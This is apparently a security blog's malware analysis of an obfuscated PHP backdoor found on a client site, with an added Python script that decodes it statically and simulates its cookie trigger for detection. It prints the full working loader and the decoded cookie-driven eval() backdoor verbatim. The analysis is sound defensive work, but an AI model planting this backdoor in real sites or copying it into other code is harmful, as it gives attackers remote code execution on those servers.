We found another interesting piece of PHP-based malware on a client site a few days ago:
$exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM";
$iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk";
$ts = str_replace("b","","bsbtr_brbepblabcbe");
$fy="sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30=";
$sjb="peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc";
$dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere");
$mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn");
$tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha();
Can you decode it and see what it is doing?
This piece of code hides every function name that a scanner might flag behind the benign PHP function str_replace, which replaces every occurrence of a search string in the subject with a replacement string. So, for example, the next line:
----- $ts = str_replace("b","","bsbtr_brbepblabcbe"); -----
replaces every instance of the character 'b' with nothing, so bsbtr_brbepblabcbe becomes str_replace. The same technique recovers two more functions:
-----
$dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere"); //base64_decode
$mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn"); //create_function
-----
All of this serves to create a function and run it on this line:
----- $tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha(); -----
The body of that function comes from the next expression (the "nd" filler is stripped out and the remaining string is base64-decoded):
----- $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy)); -----
And, once decoded, the final code is:
$c = "count";
$a = $_COOKIE;
if (reset($a) == 'mh' && $c($a) > 3) {
    $k = 'ute4m';
    echo '<' . $k . '>';
    eval(base64_decode(preg_replace(array(
        '/[^\w=\s]/',
        '/\s/'
    ), array(
        '',
        '+'
    ), join(array_slice($a, $c($a) - 3)))));
    echo '</' . $k . '>';
}
What does it do? If the first cookie value is 'mh' and the request carries more than three cookies, it joins the last three cookie values, strips everything except word characters, '=' and whitespace, turns whitespace into '+' (presumably because PHP decodes a '+' in a cookie value to a space), base64-decodes the result and evals (executes) it as PHP. In other words, it is a backdoor that runs whatever code the attacker sends in cookies, wrapping the output in <ute4m> tags, presumably so it can be located in the response.
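To show the decoding steps above statically, without executing any of the sample, here is an added Python script (not code from the original post). It strips the str_replace fillers to recover the masked function names, strips the "nd" filler from the four base64 chunks quoted above and decodes them to the stage-two source, and then simulates what that stage two would feed to eval() for a given set of request cookies, which is useful when reconstructing from access logs what an attacker actually sent. The chunk strings are taken from the post; the function names, the regex and the TRIGGER_COOKIES dictionary are this example's own constructions.

```python
import base64
import re

# The four base64 chunks exactly as they appear in the sample above ($exg, $sjb, $iyo, $fy).
EXG = "JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM"
SJB = "peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc"
IYO = "GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk"
FY = "sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30="

# The loader lines from the sample that carry masked function names.
SAMPLE_LOADER = r'''
$ts = str_replace("b","","bsbtr_brbepblabcbe");
$dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere");
$mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn");
$tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha();
'''

# Matches str_replace(<filler>, "", <literal>) whether called directly or through an
# alias such as $ts(...); only calls whose third argument is a string literal matter here.
MASKED_CALL = re.compile(r'\(\s*"([^"]*)"\s*,\s*""\s*,\s*"([^"]*)"\s*\)')


def unmask(filler, masked):
    """Mirror of PHP's str_replace(filler, '', masked): drop every occurrence of the filler."""
    return masked.replace(filler, "")


def find_masked_names(php_source):
    """Recover the names hidden behind str_replace() calls in a PHP loader, in source order.
    A scanner would compare the result against a watchlist (base64_decode, create_function,
    eval, ...) instead of looking for those names verbatim."""
    return [unmask(filler, literal) for filler, literal in MASKED_CALL.findall(php_source)]


def recover_loader():
    """Reproduce the loader's own decoding statically: strip the 'nd' filler from the
    concatenated chunks and base64-decode them. Nothing from the sample is executed."""
    names = {
        "$ts": unmask("b", "bsbtr_brbepblabcbe"),
        "$dzy": unmask("er", "erberaersereer6er4er_dereercerodere"),
        "$mc": unmask("y", "ycyryeyaytye_yfyuynctyiyoyn"),
    }
    blob = unmask("nd", EXG + SJB + IYO + FY)
    stage2 = base64.b64decode(blob, validate=True).decode("ascii")
    return names, stage2


def stage2_payload(cookies):
    """Simulate the decoded stage two on a request's cookies and return the text that
    would reach eval(), or None when the trigger conditions are not met.
    `cookies` is an insertion-ordered dict, like PHP's $_COOKIE."""
    values = list(cookies.values())
    # reset($a) == 'mh' && count($a) > 3
    if not values or values[0] != "mh" or len(values) <= 3:
        return None
    joined = "".join(values[-3:])                  # join(array_slice($a, count($a) - 3))
    joined = re.sub(r"[^\w=\s]", "", joined)       # preg_replace('/[^\w=\s]/', '', ...)
    joined = re.sub(r"\s", "+", joined)            # preg_replace('/\s/', '+', ...)
    return base64.b64decode(joined).decode("utf-8", errors="replace")


# Constructed request cookies (not from the post): first cookie 'mh', more than three
# cookies in total, the last three carrying base64 with a space where '+' belongs and a
# stray quote that the first regex strips. The payload is a harmless echo.
TRIGGER_COOKIES = {
    "mode": "mh",
    "PHPSESSID": "dummy-session",
    "p1": "ZWNobyAn",
    "p2": "eD0 J",
    "p3": 'zs="',
}

if __name__ == "__main__":
    names, stage2 = recover_loader()
    print(names)
    print(stage2)
    print(find_masked_names(SAMPLE_LOADER))
    print(repr(stage2_payload(TRIGGER_COOKIES)))
```

The decoding uses base64.b64decode(..., validate=True) so that any leftover filler character would raise instead of being silently dropped; if a variant of this loader uses a different filler, the failure points you at it. For detection, the pair of conditions in stage2_payload (first cookie 'mh', more than three cookies) is what a WAF rule or log query would match on.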